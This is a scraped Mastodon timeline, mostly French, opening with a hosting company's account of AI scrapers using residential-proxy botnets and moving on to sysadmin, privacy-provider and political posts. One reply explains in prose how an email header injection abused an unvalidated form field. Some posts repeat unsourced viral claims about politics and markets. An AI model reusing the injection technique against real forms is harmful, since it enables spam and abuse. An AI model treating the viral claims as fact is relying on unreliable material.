Hélas, les délires de l’industrie étant ce qu’ils sont, et les budgets associés à ces délires visiblement illimités, sont apparus ensuite de nouveaux robots, qui se « cachaient » en utilisant le nom d’un navigateur connu « Firefox 122 », ou « Chrome 37 ». Tout aussi mal codés, ils sont alors plus difficile à bloquer. On a alors utilisé 2 techniques. La première, « la bourrin » : on bloque toutes les adresses IPs du prestataire utilisé par ces robots, quand elles sont facile à détecter (par exemple, toutes les IPs d’Alibaba, gros prestataire chinois, qui intéresse peu ou pas nos clients de toute façon). La seconde technique était plus rigolote : souvent, ces robots utilisaient des noms de navigateurs représentant littéralement 0 % du trafic Internet de 2024, par exemple des vieux téléphone mobile Sony Ericsson, ou des version de Firefox ou Chrome périmées depuis de nombreuses années. On bloque donc à nouveau…
Reste que cela prend du temps, du temps d’ingénieur chargé de comprendre et bloquer ces pénibles (c’est le nom poli qu’on leur donne) et aussi, mais surtout, du temps de CPU, de la bande passante, de l’usure de serveur et de SSD, donc, un coût non négligeable pour Octopuce et donc pour ses clients. En 2024, on a commencé à se demander si ce surcoût pour toute société d’hébergement était pris en compte dans le bilan carbone des sociétés d’IA …

En 2025, on a vu apparaître un nouveau type de robot nocif, qui cette fois-ci est assez indétectable, et a commencé à nous pourrir la vie :
En pratique, on pourrait se dire « s’ils ne demandent que une à 5 page, ce n’est pas si grave, non ? »
Sauf que s’ils ne font que 1 à 5 demande par IP (et le plus souvent 1 à 2), ils ont plusieurs millions d’adresses IP distinctes (!!!). Pour ceux qui connaissent un peu l’Internet, disposer d’un tel pool d’adresses IPs différentes nécessite de gros moyens. Nous avons eu en septembre 2025 un crawl sauvage d’un tel robot qui, en l’espace de 2 semaines, a utilisé 1 300 000 adresses IPs distinctes, dont 950 000 ne faisaient que 1 seul appel de page. Un tel nombre d’adresses IP c’est ce qu’on appelle en réseau un « /11 », et seuls de très gros opérateurs peuvent se payer ça (orange, free, par exemple).
Sur le coup, on s’est dit : Pas grave, on va bloquer intégralement l’opérateur fautif, tant pis pour ses clients s’il y en a des légitimes. Sauf que, après analyse, on a découvert que ces adresses IPs venaient de centaines d’opérateurs distincts dans presque tous les pays ! Avec une sur-représentation du Brésil, de la Chine et de quelques autres pays inattendus de nos clients toutefois, mais on ne peut cependant pas bloquer intégralement ces pays sur nos serveurs…
À ce jour, nous n’avons pas trouvé de solution non-intrusive contre ces robots. Pour l’instant on espère juste qu’ils n’attaqueront pas nos clients, notamment les plus fragiles (ceux aux CMS un peu coûteux en ressource à chaque page, faute de cache…)

Il existe tout de même des solutions comme Anubis qui affichent une page demandant un calcul compliqué à votre navigateur avant d’autoriser la connexion à un site web. Anubis n’est hélas pas transparent pour les internautes : il affiche une page même si brièvement, le temps de résoudre le calcul demandé de manière automatique. Aucune interaction humaine n’est requise, contrairement aux Captcha, mais c’est quand même un outil plus compliqué à installer, et nécessite l’approbation de notre client.
Depuis ces attaques, on a trouvé ce qui semblerait être la source d’un si grand nombre d’adresses IPs attaquantes : certaines applications sur Android utilisent les téléphones sur lesquels ils sont installés pour offrir une partie de votre trafic (mobile ou wifi) au propriétaire de l’app installée ! Ces apps utilisent une bibliothèque nommée ProxyLib renommée plus tard SDK LumiApps, qui permet donc de monétiser votre bande passante mobile. Ce type de code est probablement illégal et assurément illégitime, mais tant que personne ne fait rien, ils pourront nuire mondialement.
En écrivant cet article, on a pu retrouver une entreprise offrant un tel service, à prix d’or, et se vantant, typiquement, ce mois-ci, d’avoir accès à 800 000 adresses IPs résidentielles américaines …
Des robots d’IA aspirent de manière indiscriminée les sites web du monde entier, souvent en ne respectant pas les fichiers robots.txt, parfois en se cachant volontairement, voire en utilisant des méthodes illégales.
Ces robots entrainent un surcout d’énergie, de ressource et de temps d’ingénieur pour être contournés ou bloqués, et ce surcout, important, n’est assurément pas compté dans les bilan carbone sur le cycle de vie de ces services d’IA.
Être hébergeur de serveurs, en 2025, c’est aussi prendre en compte ces catégories particulières de pénibles…
@benjamin tu as vu passer cet article qui parle de ça aussi ? Plus qu'Android en général, ça semble spécifiquement viser d'exploiter les Smart TV https://infosec.exchange/@jerry/116714204183091991
@benjamin y'a pas que les apps mobiles, y'a aussi les extensions de navigateur et les télés connectées (bien plus efficaces car souvent connectées à bon debit)
@lutindiscret @benjamin oui
Faut les brider H24 de toute façon elles n'ont pas besoin d'être connectées en direct...
Enfin, en les forçant à passer par la box j'espère que ça évite ce genre de choses...
@oldsysops Pas glop !
(ceci est un poste promotionnel pour le climat Dunkerquois)
et sinon vous, vous utilisez quoi ?
@oldsysops Je suis curieux, pour quelles raisons souhaites-tu remplacer uptime kuma ?
@oldsysops Oh, je vois. Tu as jeté un œil à https://selfh.st/apps/?tag=Uptime ?
@oldsysops Perso je regarderais en dehors des outils tout-en-un.
Typiquement pour monitorer j’utilise déjà Telegraf/InfluxDB/Grafana, je m’en servirais pour monitorer le site.
Ou alors je trouverais un truc qui se branche sur InfluxDB directement. Ou sur lequel brancher directement Grafana, éventuellement.
@oldsysops Ouais, mais il me semble que t’as un truc pour Prometheus pour faire du « ping » de site.
Tu colles ça avec un joli graph sur Grafana, dans un dashboard public voire embarqué dans une page, et paf, des chocapics.
Perso j’ai fait un truc strict minimum là : https://grafana.breizh.pm/public-dashboards/0fe9a58c04e34d909df9cf443485e72f?refresh=auto
(bon l’URL est pas jolie, là, mais on peut faire mieux, j’ai vu des sites le faire)
@oldsysops (est-ce que je viens de me rendre compte que mon serveur Mumble est down depuis plus d’un mois en partageant ce dashboard ? Noooon)
Derniers jours pour postuler à notre offre d'emploi d'administrateur·ice système (fin le 21 juin 2026).
RE: https://fosstodon.org/@readthedocs/116736750777757106
If anyone knows much about how to handle widespread DDOS from a multi-ASN botnet with “HostPapa” being the largest ASN, please do get in touch. 😵💫
Luc Sorel-Giffo a repartagéWe are currently dealing with an ongoing DDOS attack against our infrastructure, which is resulting in us having to enable more checks on documentation and dashboard pages. Please let us know if you have issues while connecting to our sites:
@oldsysops @ericholscher We had 15 billion HTTP requests over the past 3 days :/
Way over that I have ever seen on my end...
Strength to your sysadmin and your team.
Battery discharge vs gas peaker output in Australia's main grid
Another day, another "impossible" feat breezily achieved.
"Here are the three inverse laws of robotics:
- Humans must not anthropomorphise AI systems.
- Humans must not blindly trust the output of AI systems.
- Humans must remain fully responsible and accountable for consequences arising from the use of AI systems."
Pretty decent for a start. https://susam.net/inverse-laws-of-robotics.html
Deuxième cueillette du jour dans le saladier blanc. Y aura du sorbet (et de la confiture) pour la prochaine canicule.
1kg100 rien que dans le saladier 😋
@St_B comme une envie de débarquer avec un tupperware
on est en sécurité 🙂
fun fact : y a un dsi ou directeur de qualité qui nous a dis passer un tiers de son temps sur une journée dans les transports (soit donc 2*4h).
y a des grands malades !
How to make good open source project:
- plaster pride flags everywhere (keeps bigots away)
- swear constantly (keeps ai away)
- sex (keeps corporations away)
@tay
Seriously : swear words on a website gives me more confidence it was not written by AI.
(And yes, I have been using swear words on my website for 20 years.)
I think if you mention nuclear weapons or biological weapon somewhere in your code is a comment or some shit that might also work.
@GhostOnTheHalfShell @tay those are sex too
@davidgerard @GhostOnTheHalfShell @tay Biological weapons probably involve sex, otherwise how are the pathogens replicating? But although many nuclear weapons involve ramming one object into another really hard, that is not sex, even if you find it sexy.
@tay bot that auto closes any bug report that doesn't start with "trans rights are human rights"
If you think AI is a bubble, what is your explanation for the large and growing demand?
And maybe that's not true among people you personally know, but there are clearly lots of people and companies who are very into it.
@CryogenicNighthawk I don't see a growing demand. Maybe in the bug bounty space but every other sector I see people not wanting GenAI in everything. Or, they are apathetic and just want to do their job and not get laid off.
The only "growth" is by the billionaires and CEOs. The average person is apathetic or dislikes GenAI.
As far as I can tell, some of the recent "boosts" have merely been orchestrated by the big tech companies to try postponing the bubble popping.
At my org, they recently scaled back premium GenAI licenses. As another mentioned, organizations are not excited about paying the actual cost of tokens and such.
@CryogenicNighthawk also, it is important to not confuse forced usage/inclusion with demand. Sure, numbers are going up but how much of that is actually desired? How many people actually want Copilot in Word while Microsoft is touting large numbers of users? How many people actually want to chat with some AI bot instead of an actual human customer service representative?
I certainly see the anti-AI crowd because I've been in tech my whole life. But I also talk to people who are not involved in the tech.
Nearly everyone I see outside of the tech world sees the benefits of AI. They have concrete, lived experiences for coming to this conclusion. When I express concerns, their attitude is basically to each their own, or it works for how I want to use it.
That's not an indicator of demand based on some VC chart that goes up and to the right.
@CryogenicNighthawk I guess we just socialize with different crowds. I do see some demand but most of the people I speak with are apathetic or dislike it. The few folks that do like GenAI are not people that have very high levels of critical thinking. Or, they have very specific usage scenarios that make it work.
I think that if the average person was actually as enthusiastic as you interpret there wouldn't be so much pushback to data centers.
I mostly hang out with the anti-AI crowds, but I'm not ignorant to what the masses outside my tiny bubble are saying.
The pushback to datacenters is a good point. There are a lot of NIMBYs fighting against them and not many people fighting FOR them (aside from the construction industry and politicians who see tax revenue opportunities... as if these big companies can't evade taxes 🙄).
Most of the pushback I see is merely saying "not here" or "don't use OUR water/power for datacenters".
An easy way to avoid LLM psychosis is to never use an LLM.
This actually solves a lot of problems.
Quand même, c’est terrible tout ces associatifs et culturaux qui disent « je peux pas m’engager publiquement, sinon je perd mes subventions » .
Se rendent-ils compte de ce qu’ils disent ?
- si c’est vrai, c’est un scandale absolu en démocratie, ce sont des pratiques digne des fasciste et il faut alerter !
- si non c’est que c’est pas vrai.
Et souvent c’est pas vrai !
C’est même au contraire rendre possible les choses que de refuser de s’engager et d’avoir peur.
Se taire, hors contexte objectivement fachisant(exemple : RN) c’est contribuer à l’oppression.
Se coucher avant le problème c’est faire advenir le problème.
Et puis, si les valeurs qui vous portent sont réellement incompatible avec l’extrême droite, de toutes manières elle vous interdira et sinon, c’est que vous êtes compatibles.
donc j'ai tendance à croire/comprendre ce que je vis et constate de première main..
@oldsysops Mon propos n'était probablement pas assez clair, je ne parle pas d'asso qui tiennent des propos, mais de salariés ou bénévoles qui s'auto-censurent ayant peur de répercussion sur leurs asso.
Get #FediHired and work for @tdforg who have a vacancy for a super-admin system administrator on all #OpenSource infrastructure.
Hello j'ai un bot qui poste le form d'inscription de paheko. Il remplit des infos bidons et met une adresse mail réelle volée dans une bdd quelconque. Du coup nos mails d'inscription sont flaggés comme spam.
Il utilise un vrai-faux navigateur web qui gère le je, calcule les proof of work (donc anubis sert a rien) et effectue des vraies fausses actions en js (Scroll, déplacement de souris, clic etc). Il prend aussi un délai aléatoire pour remplir le form qui ressemble à un humain.
Il change d'adresse IP a chaque fois et de pays. Bref c'est super dur a bloquer.
Des idées pour bloquer sans passer par un recaptcha ou autre captcha centralisé et pas accessible ?
@bohwaz t'as essayé le champ pot de miel dont l'intitulé (et l'identifiant) change aléatoirement ?
@juliemoynat
Oui j'ai un champ caché en js qui bloque s'il est rempli mais ce bot ne le remplit jamais.
@bohwaz plutôt avancée comme attaque .Le changement d’ip fait penser à une attaque type hail mary cloud : https://bsdly.blogspot.com/2013/10/the-hail-mary-cloud-and-lessons-learned.html?m=0
@bohwaz
Pas évident, tu as essayé un ensemble de questions réponses aleatoires en texte ?
Sur peertube ya hcaptcha qui est utilisé.
Ta aussi la désactivation temporaire avec un champ qui demande pourquoi on veut créer un compte avec examen des réponses, tu trouveras peut être de quoi caractériser ça.
L'équipe de mastodon disait que yavait aussi des services ou des gens humains sont payés pour faire ce genre de spam à la chaîne, c'est faisable surtout pour des attaquants qui ont des moyens financiers importants.
Tu as regardé su côté de iocaine aussi ?
Ya @codimp qui a développé un outil contre le scraping des boites d'ia aussi, il saura peut être comment parer ce genre d'attaque.
@tykayn
J'ai mis une question texte pour le moment mais je me dis que c'est facile a répondre par le bot. L'inconvénient c'est que ça rajoute une étape aux usagers humains et vu que c'est le formulaire d'inscription c'est une friction supplémentaire... Ça reste temporaire. D'où ma question pour savoir si yavait mieux.
Iocaine sert a empoisonner les LLM c'est pas le même but. Paheko intégre déjà cette fonctionnalité ^^ mais ici c'est pas le même souci.
@codimp
@adrienandrem
C'est juste un cookie il me semble. Ça peut en bloquer certains mais pas sûr ici ça a l'air assez avancé, je vais tester...
@tykayn @codimp
@bohwaz
J'ai eu des salves d'inscriptions qui pourraient ressembler à ça sur un de mes sites. Désolé, je n'ai pas la réponse technique au problème.
Mais j'ai une question : je ne comprends pas pourquoi des mecs emploient des ressources pour faire ça. Sur mon site il n'y avait aucun enjeu a inscrire des comptes, aucun.
Sérieusement je ne pige pas. Réussir a le faire pour le hack OK, mais laisser tourner ensuite ... ???
@thefool
Je sais pas... Je me suis demandé si c'était pas ciblé par qqun qui veut faire couler la réputation du service... Mais j'ai l'impression que c'est trop générique pour ça.
Vous avez vérifié qu'il n'y a pas de faille qui permet d'injecter du contenu dans les mails envoyés ?
Il y a quelques années, j'ai un pote qui m'avait demandé de l'aide pour comprendre ce qui se passait... Le code de son formulaire n'échappait pas correctement les données injectées dans les mails, ce qui permettait d'injecter des entêtes et du contenu, et donc en fait de juste envoyer du spam...
@John_Livingston
C'est pas bête mais non le mail ne contient que du texte et un lien généré aléatoirement, aucun élément fourni par l'utilisateur. Les autres champs du formulaire ne contiennent pas de spam juste des chaînes de caractère random. Donc le but n'est pas le spam.
@thefool
Je précise la faille qui était exploitée sur le site de mon pote:
Il ne vérifiait pas la validité de la valeur du champ email. Il suffisait d'envoyer une valeur avec un email, puis 1 retour à la ligne, une entête subject, puis 2 retour à la ligne, puis un corps de mail. Et comme ça tu pouvait injecter n'importe quel contenu de mail.
Pas moi @bohwaz . On a toujours l'impression que dans notre coin de Web, on n’intéresse peu, en réalité beaucoup dans l'ombre attendent voire provoquent l'abandon du domaine pour profiter de sa réputation.
Après, comment on fait face à ce nouveau type d'attaque je n'en ai aucune foutue idée.
Je dirais bien, histoire de te remonter le moral, que si tu fais l'objet d'une telle sophistication, c'est que l'intérêt de ton travail est réel 🙂
J'ai peut-être une idée (un peu bancale) @bohwaz : soumettre l'ip du posteur à l'api d'un service de réputation d'ip avant de valider le form. Ça doit pouvoir se faire en php
Après comme je dis c'est bancal: doit y avoir des faux-positifs (dur pour eux) mais ça doit limiter le flood
@bohwaz Revenir à l'humain ? C'est à dire pas d'envoi automatique, il faut une validation d'une modérateurice humaine.
T'as pas 50 inscriptions par jour si ?
@Mindiell
Ça c'est un peu la solution de dernier recours oui. L'objectif c'est quand même que les gens puissent tester très rapidement le logiciel sans barrière et voir si ça leur convient :)
Petite surprise du matin, je prends le bus (et le train) avec un ancien collègue de #dunkerque qui s'en va chez un client sur paris.
@oldsysops
Ouais, tu ne nous aimes pas c'est tout.
Alors que tout ce qu'on voulait c'était une nouvelle tête au bar avec nous...
Pour info les gens qui sont encore fans de Proton Mail : ils sponsorisent des vidéos de Vincent Lapierre (le youtubeur d'extrême droite)
@nileane Merde.
Ok to quote this and restate in English? I feel like more people should know this.
C'est compliqué en effet et ce serait sympa de nous dire où aller :)
@nileane
Malheureusement Protonmail avait été très clair sur son positionnement politique libertarien-ok-avec-l'ED. De mémoire c'était un message du genre "il faut parler à tout le monde qui sommes nous pour juger".
@nileane this site does not exist or was taken down by Proton mail https://proton.me/vincentlapierre
Did someone check if the Vincent's statement was true?
As I see it, Proton was not sponsoring this Vincent. They have a program that if you bring a new client you get a small amount: https://proton.me/partners
Hey PROTON, VOus faîtes vraiment des partenariats avec ce mec? Plus de proton pour moi, quand bien même je dois tout migrer.
No place for that #protonpartenariatpourri.
@nileane Et en plus c'est cher. 😔
J'ai tout dessus, maintenant. Drive, ça passe encore, mail c'est super chiant ça fait que un an que j'ai complètement arrêté gmail, les gens viennent juste d'avoir le mémo, mais alors le gestionnaire de mdp et surtout les alias, y a quelque chose à faire pour transférer ?
Et em fait, transférer où ? Y a quoi qui est bien ?
@Makaku @fa @nileane
Ne mettez pas vos mots de passe en ligne. Une mini clé USB qui tient dans le porte feuille avec un keepass fera l'affaire.
Mettre tous ces services au même endroit est déraisonnable (tout les oeufs dans le même panier).
Ça peut carrément aller jusqu'à Banque-assurance-provider-email-coffre fort numérique... C'est zinzin de fragilité.
@turlup1 @fa @nileane
La clé USB me semble trop contraignante pour moi (notamment pour la brancher sur mon tel) et j’en parle même pas pour ma mère 😬
On m’avait plutôt conseillé les gestionnaires de mot de passe en terme de sécurité, quel est le risque si les mot de passe sont chiffrés de bout en bout ?
@Makaku @fa @nileane
En ligne = publique.
Chiffrement = protection temporaire (finit par avoir un contournement), les gens ne changent pas une fois une solution adaptée, et internet n'oublie jamais.
Certaines clés USB sont en usbC et il existe des adaptateurs.
Ce n'est pas parfait non plus, la clé physique, mais confier ses mots de passe à des sociétés, surtout grand public, c'est attirer les hackers. Tôt ou tard le site tombera. Pourquoi choisir une solution qui va fail à coup sûr ?
@turlup1 @Makaku @nileane
Je sais pas si le ton condescendant est nécessaire, om fait ce qu'on peut.
Pour répondre à la question, parce que j'y connais pas grand chose, que des gens qui s'y connaissent avaient l'air de trouver ça bien, que ça me permettait d'avoir des mdp plus variés, que j'étais sous windows jusqu'à peu de temps le temps de trouver de l'aide et que j'aurais pas stocké ça dans un doc que windows peut lire, et oui j'ai passé 3 ans à me dire que ça paraissait peu safe les gestionnaires de mdp avant qu'on me rassure que si?
Au dlà du fait que je comprends rien à l'explication sur les clés USB, la clé USB je la perds, c'est sûr, donc pas possible pour moi (90 % de mes clés usb ont été perdues). Ça veut dire que les mdp doivent être plus simples à retenir càd ou simples ou semblables.
@fa @Makaku @nileane
Pas de condescendance (c'est l'écrit, il n'y a pas ce qu'il faut pour comprendre le ton).
Je comprends. Nul n'est tenu de faire plus que de son mieux 🤗
Mais l'activité de retenir en ligne les mots de passe n'attire pas forcément que des gens bien.
Ce qui est en ligne est publique, d'une façon ou d'une autre, et pire qu'un papier dans la poche 🤷
Chez moi 3 générations (avec ou sans TDAH) converties à l'utilisation d'une clé USB qui rentre dans le port USBC du téléphone.
@fa @Makaku @nileane
Tu n'utilises la clé USB (toute mimi toute petite, avec la monnaie dans le porte monnaie) qu'en cas de création de nouveaux mots de passe, keepass s'installe sur toutes machines.
Mais c'est mieux si quelqu'un montre et explique. Après est -ce réellement plus difficile qu'un compte mastodon à créer / utiliser gérer... À chacun de voir 🤷
La question de l’utilisation d’un trousseau de mots de passe ne se pose plus vraiment, avec la profusion de comptes et la nécessité d’avoir des mots de passe forts et tous différents c’est devenu la solution principale.
Néanmoins, aller au delà dans les recommandations c’est passer à côté de l’essentiel : le modèle de menace. Ce qui peut marcher pour une personne peut être une prise de risque intenable pour une autre, tout simplement parce que les deux personnes n’ont pas le même modèle de menace : leur besoin de sécurité ne porte pas sur les mêmes choses, les risques auxquels iels sont exposé·es sont différents.
Un trousseau en ligne peut être plus sûr qu’un trousseau KeePass sur une clé USB.
Il existe quelques ressources bien faites sur l’établissement de son modèle de menace personnel, étape primordiale avant de décider ce qu’on va protéger et comment on va le protéger (gestion de mdp bien sûr, mais aussi chiffrement des disques, sauvegardes, choix de messagerie, etc.)
Par exemple : https://www.privacyguides.org/fr/basics/threat-modeling/ et https://ssd.eff.org/fr/module/votre-plan-de-s%C3%A9curit%C3%A9
@nileane
C'est peut-être le moment de rappeler quelques infos sur Proton :
- Proton Mail transmet des données personnelles à la justice espagnole
https://www.djan-gicquel.fr/proton-mail-transmet-des-donnees-personnelles-a-la-justice-espagnole
- ProtonMail transmet des adresses IP à la police : 4 questions pour comprendre la polémique
https://www.numerama.com/tech/736940-protonmail-transmet-des-adresses-ip-a-la-police-4-questions-pour-comprendre-la-polemique.html
- La vérité sur Protonmail (2020)
https://www.djan-gicquel.fr/la-verite-sur-protonmail
CCL : « Si je suis dans une activité militante le mail ne répond jamais à mon modèle de menace je devrais utiliser une messagerie décentralisée et sécurisée. »
@nileane this is why we can't have nice things.
@nileane do you possibly have recommendations for alternatives?
@jvnknvlgl @nileane Some alternatives are Tuta Mail, Posteo, Mailfence and Mailbox.org.
My number one recommendation would be Tuta Mail, also from a political perspective.
@jakob_36 @jvnknvlgl @nileane
I am not sure if it includes email hosting, but FDN / FFDN is an alternative French FAI for almost everything else (except Invidious or Nitter).
Some services are for paid members only, including fibre access that is not BOFS.
@federationfdn
@FDN
@Aquilenet
@dec23k We (FDN) do mail but only for our members :
https://www.fdn.fr/services/services-aux-adherents/
See also https://www.demailnagement.net/
RE: https://nileane.fr/@nileane/116715096125409125
Proton a répondu :
Dr. Sobek a repartagéProton has responded (https://www.reddit.com/r/ProtonMail/comments/1u05xs2/comment/oqgihvq/)
@nileane Ils parlent pas français en Suisse ?
@adamas
"La Suisse comporte quatre régions culturelles et linguistiques et quatre langues nationales : l'allemand, le français, l'italien et le romanche"
https://fr.wikipedia.org/wiki/Suisse
Ce qui n'excuse pas de signer des sponsoring sans se renseigner.
@gub Non mais t'as raison de le pointer du doigt, c'est juste que sachant que le siège et donc l'endroit où il y a le plus d'employés et de décisions prises étant à Genève, j'imagine que ça a du passer par eux, voire j'espère que les partenariats en francophone sont gérés par des francophones.
@nileane le problème est que si ça tombe le boulanger, le boucher, le vendeur se légumes ont aussi des idées d extrême droite, vu les scores en France ce ne serait pas étonnant donc voilà voilà (sans parler des vêtements fringues chocolat café...)
@greenman @nileane Ouai mais ya aucun rapport quand tu utilises un mail censé protéger les droits humains plus que les autres, c'est difficilement compatible ce genre de fafs qui luttent contre. Ça plus le coming out trumpiste du patron de Proton.. ça fait beaucoup quand même.
Un vendeur de fruits et légumes faf ya juste rien à voir en terme d'impact faut vraiment tordre ça dans tout les sens pour essayer de faire croire le contraire
@Satin_Therese @nileane juste pour dire que je dois utiliser des services tenus, dirigés par des gens dont les idées me rebutent. probablement toi aussi...
Je precise que je ne file aucune thune à Proton du moins directement compte gratuit. Après je ne suis pas exemplaire hein désolé 🙃.
@Satin_Therese @greenman @nileane
Perso si je sais que mon boulanger à des idées racistes, bah c'est plus mon boulanger.
Mais bon si c'est acceptable pour certains...
@nileane Errrrrggg....
Thunderbird et Infomaniak, ça tient où ça va vriller droitard dans pas longtemps ?
@eriko_hana @nileane Pour Infomaniak a priori ça devrait tenir :
https://news.infomaniak.com/fondation-infomaniak-cloud-souverain/
i switched from gmail to proton mail for specifically that reason 😒
who do you recommend I switch to now?
how do we know they won't go the same direction?
@WorldTravelerAll7 @nileane Tuta may be an option, though I have no experience with them (yet?). Based in Germany and is active on mastodon: @Tutanota
@WorldTravelerAll7 @nileane @Tutanota Sorry, intended to be of help, but should have done a bit more effort and research it all for you.
Have a nice day.
i very much appreciate the discussion of this
i find it quite frustrating to have to change from one platform to another
& every time i learn of a new platform, someone disparages them
did you know that the number of bots creating content on the internet now exceeds the number of humans?
the discussion you've broached is of help. thank you. and don't relent!
meanwhile, i'll sit here w/ my proton email account. i won't know whether it is run by fascists trying to destroy the "resistance" or impotent
most people sell their data to "Tim Apple" w/o even understanding what they are selling
but here i sit wondering whether the "safe" "encrypted" email provider i chose actually protects my data. or if some nefarious actor attempts to besmirch its character to gain providence
i hate this crap
I've read the Proton explanation on how they handle encryption.
If they do what they say they do (we can't verify because it's on their servers, but there's no indication that they don't) then it's quite robust, and they actually protect your data.
That has little to do with their centrist attitude "we accept all ideologies and commit to none" but is weakened by their adoption of a commercial mindset and marketing practices.
1/2
Notably by the fact that they use a US company (zendesk) for their support system and don't see a problem with that.
They don't hide it but they don't really explain the consequences of it either...
Also the white lock on their messages means "stored with zero-access encryption" which is quite misleading as it can be easily confused with the blue lock for "end-to-end encryption"...
In his first 150 days, Mayor Mamdani has:
- closed a $12B deficit
- collected $9M in unpaid fines from Bezos
- recovered $5M in stolen wages for gig workers
- raised minimum wage to $30/hr
- drove violent crime to record lows
- marched for trans rights
I don't ever want to hear an excuse from a single Democrat ever again. Turns out the "radical leftist agenda" is just competent representation.
Imagine this guy becoming president in the US.
@Lana @v_d_richards he’s not born in the USA, he can’t be
@teslawf @Lana @v_d_richards Which is a damned inconvenient law in this particular case. 🫤
@courtcan @teslawf @Lana @v_d_richards Could always pass the 61st amendment ...https://www.imdb.com/title/tt0106697/quotes/?item=qt0412476
@teslawf
People are also constitutionally barred from a third term. Is that stopping the right from campaigning for Trump getting one?
@Lana @v_d_richards
@Lana @Blort @v_d_richards afaik it’s not in the constitution but just because Washington refused to serve a third term?
Roosevelt did 3 terms in a row.
@teslawf @Lana @Blort @v_d_richards
FDR was elected president a whopping 4 times, he just happened to die in office in 1945. The 22nd Amendment to limit it to 2 terms was put into place shortly after.
@Lana that is propaganda from the communist supreme leader of the Union of Socialist NYC boroughs 😀
The only reason her got the debt down is that he weaponized his million dollar smile to make Gov Hochul weak on her knees, smitten to the max and unable to refuse his request 😀
(Seriously, I hope he can maintain this positive momentum and show that good social policies are not radical)
Joke aside, that's true.
Kudos for Mamdani for his successful negotiation with Hochul, but if it's technically true that he "closed the 12 billion deficit", presenting it like a result of his good financial management of the city is bordering on dishonesty - it's a result of his very good political skill, but also of a favorable situation.
Stocks are dumping. $2 trillion wiped out from US stock market today. S&P 500 down 2.6%.
Crypto is dumping. Bitcoin crashed under $60,000. Over $130 billion wiped out from crypto today.
Gold is dumping. Gold down 4% today.
Nasdaq-100 down -4.8% and Nasdaq down 4.2% today.
$1 trillion wiped out from Semiconductor stocks today. PHLX semiconductor index down over 10%.
Trillions of dollars wiped out today. Absolute bloodbath.
@oldsysops il te reste à apprendre ce qu'est une CAE parce que c'est moins pire que le portage salariale
Vous aimez Python, Django, les logiciels libres et toute cette sorte de choses ? Profitez de votre week-end pour postuler ! On ferme dimanche soir.
#jerecrute #python #django #logiciellibre
https://mastodon.libre-entreprise.com/@entrouvert/116651361333143503
Wesh #Grenoble.
Il fut un temps, ma chère et tendre faisait des #peintures/#coutures.
Elle vide les stocks et donne les deux dernières. Si ça motive quelqu'un.e un peu de #déco #artisanale, c'est par ici.
Edit: adjugés à @Thomas et @sweetsumo .
@PacoVelobs @Thomas génial :) Tu me diras ou et quand !
@sweetsumo
On va bien réussir à faire un mastopéro post JDLL cette semaine hein.
@fabi1cazenave
@NuclearSquid
@ashiel
@AnhkaaDNeige
@metacosm
@Thomas
@PacoVelobs @sweetsumo @NuclearSquid @ashiel @AnhkaaDNeige @metacosm @Thomas
Bah oui, on a des claviers et un chien, donc on est bon.
@fabi1cazenave @PacoVelobs @NuclearSquid @ashiel @AnhkaaDNeige @metacosm @Thomas oui, j'ai les 2, c'est bon !
@sweetsumo
J'ai ça aussi mais on sait depuis le temps que le chien n'est pas estaminet compatible. Je viendrais donc sans l'un ni l'autre vu que l'autre n'est plus très intéressant.
Reste donc les tableaux.
On dit quand, jeudi ?
On dit où, le truc autogéré près de la MC2 dont j'ai oublié le nom ?
Le Neptune est trop bruyant.
@fabi1cazenave @NuclearSquid @ashiel @AnhkaaDNeige @metacosm @Thomas
@PacoVelobs @sweetsumo @NuclearSquid @ashiel @AnhkaaDNeige @metacosm @Thomas
Jeudi soir, Bivouak café, donc. Qu’il en soit ainsi.
@fabi1cazenave
https://la-correspondance.fr/index.php/le-bivouak-cafe/
Cc @oldsysops si t'es tjs dans le coincoin.
Also @Ilygad
@sweetsumo @NuclearSquid @ashiel @AnhkaaDNeige @metacosm @Thomas
@oldsysops Arf, moche… :-(
Pour les autres, @PacoVelobs @Ilygad @sweetsumo @NuclearSquid @ashiel @AnhkaaDNeige @metacosm @Thomas, demain 18h au Bivouak, ça joue ?
@sweetsumo @Thomas c'est ok pour vous pour les tableaux ?
@PacoVelobs @Thomas Arg j’ai trop d’enfants demain soir :(
c’est possible dans le week-end ?
@sweetsumo
Pas pour moi.
Le weekend je suis dans le ciel loin des petits et grands si Eole le veut.
Ou en tête-à-tête avec mon aimée le reste du temps.
@Thomas
@PacoVelobs @sweetsumo C'est jouable mais je passerai en coup de vent en sortie de boulot si c'est jouable pour toi ? Tu arrives tôt en général non ?
@Thomas
Yes. Mais là c'est plus loin.
Je peux les laisser chez moi pour une autre fois hein.
@sweetsumo
@fabi1cazenave
J'en suis toujours yes.
@oldsysops @Ilygad @sweetsumo @NuclearSquid @ashiel @AnhkaaDNeige @metacosm @Thomas
@fabi1cazenave @oldsysops @PacoVelobs @Ilygad @sweetsumo @NuclearSquid @ashiel @AnhkaaDNeige @metacosm @Thomas
Z'êtes au courant qu'il pleut averse ce soir ? 😬
Ça sent pas la motivation de braver la pluie ici en tout cas
@Maoulkavien @oldsysops @PacoVelobs @Ilygad @sweetsumo @NuclearSquid @ashiel @AnhkaaDNeige @metacosm @Thomas
Ça n’a pas l’air si grave que ça, si j’en crois France Nuages. C’est où que tu as lu que ça serait si relou que ça ?
@fabi1cazenave J'ai aussi masse de flotte sur mes vilains trucs de parapentistes.
@Maoulkavien @oldsysops @Ilygad @sweetsumo @NuclearSquid @ashiel @AnhkaaDNeige @metacosm @Thomas
@PacoVelobs @Maoulkavien @oldsysops @Ilygad @sweetsumo @NuclearSquid @ashiel @AnhkaaDNeige @metacosm @Thomas
Si tout le monde est en sucre *ET* dispo demain soir, on peut repousser à demain soir. Qui n’est pas dispo demain soir ?
@fabi1cazenave @PacoVelobs @Maoulkavien @oldsysops @Ilygad @sweetsumo @ashiel @AnhkaaDNeige @metacosm @Thomas
Je vais avoir une répé avec mon groupe entre 18h et 20h. Je peux monter sur mon vélo pour vous rejoindre la fête plus tard, mais ça veut dire que j’arrive vers 21h, quoi
@NuclearSquid @PacoVelobs @Maoulkavien @oldsysops @Ilygad @sweetsumo @ashiel @AnhkaaDNeige @metacosm @Thomas
On risque d’y être de 21h à minuit, pour des questions de sécurité.
(Et de 18h à 21h, pour des questions d’hydratation.)
@fabi1cazenave @oldsysops @PacoVelobs @Ilygad @sweetsumo @NuclearSquid @ashiel @AnhkaaDNeige @metacosm @Thomas
Ma météo est assez alarmiste sur le sujet on va dire 😬
